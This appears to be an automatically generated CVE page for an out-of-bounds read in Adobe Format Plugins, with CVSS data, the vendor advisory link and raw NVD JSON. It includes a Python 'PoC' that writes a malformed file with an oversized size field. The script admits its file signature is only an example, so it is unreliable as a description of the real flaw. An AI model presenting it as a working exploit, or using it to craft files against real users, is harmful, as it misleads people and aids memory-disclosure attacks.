Security Vulnerability Report
CVE-2025-61845 CVSS 5.5 MEDIUM

CVE-2025-61845

Published: 2025-11-11 19:15:37
Last Modified: 2025-11-13 15:18:25

Description

Format Plugins versions 1.1.1 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:* - VULNERABLE
Adobe Format Plugins <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-61845 PoC - Adobe Format Plugins Out-of-bounds Read

Note: This is a conceptual PoC demonstrating the vulnerability pattern.
Actual exploitation requires specific file format crafting.
"""
import struct


def create_malicious_format_plugin(output_path):
    """
    Generate a malicious Format Plugin file to trigger OOB read.

    This PoC creates a minimal malformed file structure.
    """
    # Format Plugin magic bytes (example)
    header = b'FPGB'  # Format Plugin signature

    # Malformed header designed to trigger OOB read
    # Version field manipulation
    version = b'\x01\x01\x01'  # Version 1.1.1

    # Crafted size field, far larger than the data that follows, that may
    # cause a read past the end of the buffer when parsed by vulnerable code
    size_field = struct.pack('<I', 0xFFFFFFFF)  # Large size value

    # Malformed data block
    data_block = b'A' * 1024 + b'\xDE\xAD\xBE\xEF'

    # File structure
    malicious_content = header + version + size_field + data_block

    with open(output_path, 'wb') as f:
        f.write(malicious_content)

    print(f"[+] Malicious file created: {output_path}")
    print(f"[+] File size: {len(malicious_content)} bytes")
    print("[*] This file may trigger OOB read in vulnerable Adobe Format Plugins")
    print("[*] User interaction required: victim must open this file")


def main():
    output_file = "CVE-2025-61845_malicious.fp"
    create_malicious_format_plugin(output_file)
    print("\n[!] Disclaimer: This PoC is for educational and security research purposes only.")


if __name__ == "__main__":
    main()

References

https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61845", "sourceIdentifier": "[email protected]", "published": "2025-11-11T19:15:36.543", "lastModified": "2025-11-13T15:18:25.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Format Plugins versions 1.1.1 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:*", "matchCriteriaId": "9FE89744-A347-4449-8733-D54CA0E25723"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}